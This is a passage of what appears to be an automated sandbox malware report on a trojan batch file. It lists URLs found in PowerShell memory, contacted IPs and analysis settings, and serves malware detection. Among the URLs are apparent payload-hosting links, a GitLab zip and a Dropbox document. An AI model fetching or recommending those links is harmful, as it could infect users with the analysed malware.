                                      https://pal-test.adyen.compowershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.dropbox.compowershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://paper.dropbox.com/cloud-docs/editpowershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 00000010.00000002.2464066818.0000022E2D3AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://ucf1b725e67a1bbd002a86ad32fd.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.2237505054.000001D6BA70E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA710000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://snowplow.trx.gitlab.netpowershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://app.hellosign.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://collector.prd-278964.gl-product-analytics.compowershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.hellosign.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://instructorledlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: phishing
                                                    		unknown
                                                    https://www.dropbox.com/page_success/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://gitlab.compowershell.exe, 0000000E.00000002.2298327925.0000015FC7309000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.dropbox.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.dropbox.com/pithos/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://sales.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://photos.dropbox.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://a.sprig.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.docsend.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.dropbox.com/encrypted_folder_download/service_worker.jspowershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://gitlab.com/assets/powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.micrSystem.resourcesA_2009-04-02.crt0powershell.exe, 0000000C.00000002.2256767486.000001D6D13F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envpowershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://navi.dropbox.jp/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://contoso.com/powershell.exe, 00000010.00000002.2464066818.0000022E2D3AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.2237505054.000001D6BAA6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2252831478.000001D6C910E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2252831478.000001D6C9251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC79C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2353648161.0000015FD601E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2353648161.0000015FD6161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2464066818.0000022E2D4F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2382462525.0000022E1ED04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2464066818.0000022E2D3AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.dropbox.com/static/api/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://edge-block-www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.2237505054.000001D6BA710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?powershell.exe, 0000000C.00000002.2236904626.000001D6B70D2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6B92D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://apis.google.compowershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://officeapps-df.live.compowershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://api.login.yahoo.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://gitlab.com/bosse21/mkt/-/raw/main/12fukrun.zippowershell.exe, 0000000E.00000002.2361414263.0000015FDE120000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.2237505054.000001D6B90A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC5FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2382462525.0000022E1D341000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://sentry.gitlab.netpowershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://login.yahoo.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://docsend.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.dropbox.com/playlist/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.recaptcha.net/powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://onedrive.live.com/pickerpowershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://gitlab.com(powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.2237505054.000001D6BAA6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2252831478.000001D6C910E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2252831478.000001D6C9251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC79C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2353648161.0000015FD601E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2353648161.0000015FD6161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2464066818.0000022E2D4F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2382462525.0000022E1ED04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2464066818.0000022E2D3AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://showcase.dropbox.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://ucf1b725e67a1bbd002a86ad32fd.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.dropbox.com/static/serviceworker/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.dropbox.compowershell.exe, 0000000C.00000002.2237505054.000001D6B9CD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.2382462525.0000022E1D571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.2382462525.0000022E1D571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://go.micropowershell.exe, 0000000C.00000002.2237505054.000001D6B9CD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC6BE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2382462525.0000022E1DF71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://new-sentry.gitlab.netpowershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://contoso.com/Iconpowershell.exe, 00000010.00000002.2464066818.0000022E2D3AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.dropbox.com/v/s/playlist/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.2382462525.0000022E1D571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://docs.sandbox.google.com/document/fsip/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://docs.sandbox.google.com/spreadsheets/fsip/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://ucf1b725e67a1bbd002a86ad32fd.dl.dropboxusercontent.com/cd/0/get/Cel62Zb6Z6skuFAMIcLW6_-9x9nNpowershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://docs.google.com/document/fsip/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://help.dropbox.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://docs.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://canny.io/sdk.jspowershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://gitlab.com/-/sandbox/powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://gitlab.com/admin/powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://customers.gitlab.compowershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://gitlab.com/-/speedscope/index.htmlpowershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://selfguidedlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://www.google.com/recaptcha/powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://sourcegraph.compowershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_advertising_campaign_and_collaboration.docx?powershell.exe, 0000000C.00000002.2237226709.000001D6B72B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://aka.ms/pscore68powershell.exe, 0000000C.00000002.2237505054.000001D6B90A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC5FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2382462525.0000022E1D341000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://docs.sandbox.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://dl-web.dropbox.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://app.hellofax.com/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://cfl.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.paypal.com/sdk/jspowershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.dropbox.com/scl/fi/8wcdoh5jl9xyp5powershell.exe, 0000000C.00000002.2255607311.000001D6D10E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://docs.google.com/spreadsheets/fsip/powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.dropbox.com/csp_log?policy_name=metaserver-whitelistpowershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high

                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                              Public IPs

                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              172.65.251.78
                                                                                                                                                              		gitlab.comUnited States
                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                              162.125.66.18
                                                                                                                                                              		www-env.dropbox-dns.comUnited States
                                                                                                                                                              		19679DROPBOXUSfalse

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                              Analysis ID:1557419
                                                                                                                                                              Start date and time:2024-11-18 08:46:07 +01:00
                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 5m 21s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                              Number of analysed new started processes analysed:19
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Sample name:13jhsfbose.bat
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.evad.winBAT@30/16@3/2
                                                                                                                                                              EGA Information:Failed
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              • Number of executed functions: 17
                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Found application associated with file extension: .bat

                                                                                                                                                              Warnings

                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 2352 because it is empty
                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 4336 because it is empty
